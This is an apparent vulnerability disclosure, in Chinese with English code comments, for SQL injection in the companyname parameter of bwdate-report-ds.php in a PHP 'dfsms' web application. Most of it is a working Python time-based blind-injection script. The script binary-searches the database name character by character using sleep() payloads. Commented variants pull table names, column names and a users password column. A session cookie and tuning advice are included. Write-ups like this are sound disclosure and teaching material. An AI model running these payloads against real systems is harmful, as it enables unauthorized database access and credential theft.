1.首先在源码 bwdate-report-ds.php 中可以看到,变量 '$cname'(对应 POST 参数 companyname,见下方验证代码)被直接拼接进 SQL 语句;再结合其后的 if-else 分支可以判断,该变量的内容能够拼接成恶意 SQL 并被执行。验证时采用基于时间(sleep)的盲注,逐字符读取数据。

2022-09-18T15:20:35.png
2022-09-29T08:40:48.png

2.漏洞验证代码如下(基于时间的盲注:注入 if(...,sleep(3),-1),以响应耗时是否超过 2 秒作为真/假判定;复现时需把 Cookie 中的 PHPSESSID 换成自己的有效会话,并根据目标的网络延迟调整判定阈值,否则延迟抖动会造成误判):

import requests
import time
 
# Vulnerable endpoint: the ``companyname`` POST parameter is concatenated into
# the report query (see ``payload``), so every request below is a probe
# against it.
url = "http://localhost/DFScms/dfsms/bwdate-report-ds.php"
# Characters recovered so far; ``exp`` appends one per position and echoes it.
flag = ''
 
 
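def payload(i, j, delay=3, threshold=2.0):
    """Time-based blind-injection oracle for one character comparison.

    Sends a POST to the vulnerable ``bwdate-report-ds.php`` endpoint whose
    ``companyname`` value closes the string literal and injects
    ``if(ascii(substr(database(), i, 1)) > j, sleep(delay), -1)``.  If the
    server takes longer than ``threshold`` seconds to answer, the comparison
    is taken to be true.

    Args:
        i: 1-based character position inside ``database()``.
        j: ASCII value the character is compared against (strictly greater).
        delay: seconds the injected ``sleep()`` stalls the query.  Keep it
            well below the 15 s request timeout used below.
        threshold: elapsed seconds above which the answer counts as true.
            It must sit clearly above the target's normal round-trip time,
            otherwise network jitter yields false positives and the binary
            search in ``exp`` recovers wrong characters.

    Returns:
        1 when the response exceeded ``threshold`` (comparison true), else 0.

    Raises:
        requests.RequestException: on connection failure or when the request
            exceeds the hard 15 s timeout.
    """
    # Database name probe.  With the defaults this is byte-identical to the
    # payload used in the original write-up.
    sql = (
        "companyname=-1'and if(ascii(substr(database(),%d,1))>%d,sleep(%d),-1)"
        "and'1=1&submit=" % (i, j, delay)
    )
    # The variants below come from a different target (GET parameter ``id``,
    # ``#`` comment terminator).  They would have to be rewritten into the
    # ``companyname=-1'...and'1=1`` shape above before they work here.
    # Table names:
    # sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # Column names:
    # sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # Data (e.g. a password column):
    # sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        # NOTE(review): session id captured during the original run; replace
        # it with a live PHPSESSID for the target (the endpoint was exercised
        # with an authenticated session, so it may reject anonymous requests).
        "Cookie": "PHPSESSID=iv4ujtg89cbg68hdmaqb4bbkl7",
    }

    # Monotonic clock: a wall-clock adjustment (NTP step, DST) mid-request
    # would otherwise corrupt the timing measurement the oracle relies on.
    started = time.monotonic()
    # verify=False is a no-op for plain http; it only disables TLS
    # certificate checking if the url is switched to https.
    requests.post(url=url, headers=headers, data=sql, timeout=15, verify=False)
    elapsed = time.monotonic() - started
    return 1 if elapsed > threshold else 0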
 
 
def exp():
    """Recover the current database name one character at a time.

    Uses ``payload`` as a boolean oracle ("is the ASCII code of character
    *pos* greater than *guess*?") and binary-searches 31..127 for each
    position.  Each recovered character is appended to the module-level
    ``flag`` and the running value is printed.  Extraction stops at the first
    position that resolves to a search bound (31 or 127) -- an empty
    ``substr`` result past the end of the name gives ascii 0, which collapses
    to 31 -- or after 199 characters.
    """
    global flag
    for pos in range(1, 200):
        lo, hi = 31, 127
        # Lower-bound search: the oracle answers "ascii > mid".
        while lo <= hi:
            mid = (lo + hi) // 2
            if payload(pos, mid):
                lo = mid + 1
            else:
                hi = mid - 1
        # On exit hi == lo - 1, so this is simply lo: the smallest value the
        # character did not exceed, i.e. its ASCII code.
        code = (lo + hi + 1) // 2
        if code in (127, 31):
            break
        flag += chr(code)
        print(flag)
 

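if __name__ == "__main__":
    # Guard the entry point so importing this module (e.g. to reuse
    # ``payload`` against another column) does not immediately start
    # firing requests at ``url``.
    exp()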

3.运行代码,即可逐字符爆破出当前数据库名(database());当某一位的结果落到搜索边界(ASCII 31 或 127)时脚本停止。若要进一步获取表名、列名和字段数据,可参考代码注释中的子查询,但需先改写成本接口的 companyname 注入格式。

2022-09-18T14:54:32.png